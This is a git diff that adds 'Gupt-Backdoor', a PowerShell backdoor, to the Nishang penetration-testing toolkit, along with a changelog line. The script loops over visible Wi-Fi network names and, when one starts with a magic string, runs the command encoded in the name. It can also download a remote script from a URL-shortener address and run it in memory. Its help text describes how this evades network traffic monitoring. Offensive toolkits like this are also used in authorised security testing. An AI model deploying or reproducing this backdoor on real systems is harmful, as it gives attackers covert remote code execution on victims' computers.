diff --git a/Backdoors/Gupt-Backdoor.ps1 b/Backdoors/Gupt-Backdoor.ps1 new file mode 100644 index 0000000..64d1d90 --- /dev/null +++ b/Backdoors/Gupt-Backdoor.ps1 @@ -0,0 +1,87 @@ +<# +.SYNOPSIS +Gupt is a backdoor in Nishang which could execute commands and scripts from specially crafted Wireless Network Names. + +.DESCRIPTION +Gupt looks for a specially crafted Wireless Network Name/SSID from list of all avaliable networks. It matches first four characters of +each SSID with the parameter MagicString. On a match, if the 5th character is a 'c', rest of the SSID name is considered to be a command and +exeucted. If the 5th character is a 'u', rest of the SSID is considered the id part of Google URL Shortener and a script is downloaded and +executed in memory from the URL. See examples for usage. + +Gupt does not connect to any Wireless network and this makes it more stealthy and helps in bypassing network traffic monitoring. + +.PARAMETER MagicString +The string which Gupt would compare with the available SSIDs. + +.PARAMETER Arguments +Arguments to pass to a downloaded script. + +.EXAMPLE +PS > Gupt-Backdoor -MagicString op3n -Verbose +In above, Gupt will look for an SSID starting with "op3n". To execute whoami on the target, the wireless network name should be "op3ncwhoami". + +PS > Gupt-Backdoor -MagicString op3n -Verbose +In above, Gupt will look for an SSID starting with "op3n". To execute a powershell script on the target, the wireless network name should be +"op3nunJEuug". Here, Gupt will use of characters after the 5th one and make the URL http://goo.gl/nJEuug. A script hosted at the URL resolved +by the Google shortener would be downloaded and executed. + +.LINK +http://www.labofapenetrationtester.com/2014/08/Introducing-Gupt.html +https://github.com/samratashok/nishang +#> + +function Gupt-Backdoor +{ + [CmdletBinding()] Param( + + [Parameter(Position=0, Mandatory = $True)] + [String] + $MagicString, + + [Parameter(Position=3, Mandatory = $False)] + [String] + $Arguments + + ) + #Get list of available Wlan networks + while($True) + { + Write-Verbose "Checking wireless networks for instructions." + $networks = Invoke-Expression "netsh wlan show network" + $ssid = $networks | Select-String "SSID" + $NetworkNames = $ssid -replace ".*:" -replace " " + ForEach ($network in $NetworkNames) + { + #Check if the first four characters of our SSID matches the given MagicString + if ($network.Substring(0,4) -match $MagicString.Substring(0,4)) + { + Write-Verbose "Found a network with instructions!" + #If the netowrk SSID contains fifth chracter "u", it means rest of the SSID is a URL + if ($network.Substring(4)[0] -eq "u") + { + Write-Verbose "Downloading the attack script and executing it in memory." + $PayloadURL = "http://goo.gl/" + $network.Substring(5) + $webclient = New-Object System.Net.WebClient + Invoke-Expression $webclient.DownloadString($PayloadURL) + if ($Arguments) + { + Invoke-Expression $Arguments + } + Start-Sleep -Seconds 10 + } + elseif ($network.Substring(4)[0] -eq "c") + { + $cmd = $network.Substring(5) + if ($cmd -eq "exit") + { + break + } + Write-Verbose "Command `"$cmd`" found. Executing it." + Invoke-Expression $cmd + Start-Sleep -Seconds 10 + } + } + } + Start-Sleep -Seconds 5 + } +} \ No newline at end of file diff --git a/CHANGELOG.txt b/CHANGELOG.txt index 3acc421..edd5ce5 100644 --- a/CHANGELOG.txt +++ b/CHANGELOG.txt @@ -1,3 +1,5 @@ +0.3.7 +- Added Gupt-Backdoor to Backdoors. 0.3.6.6 - Changes to Download_Execute to make it work with authentication proxies. 0.3.6.5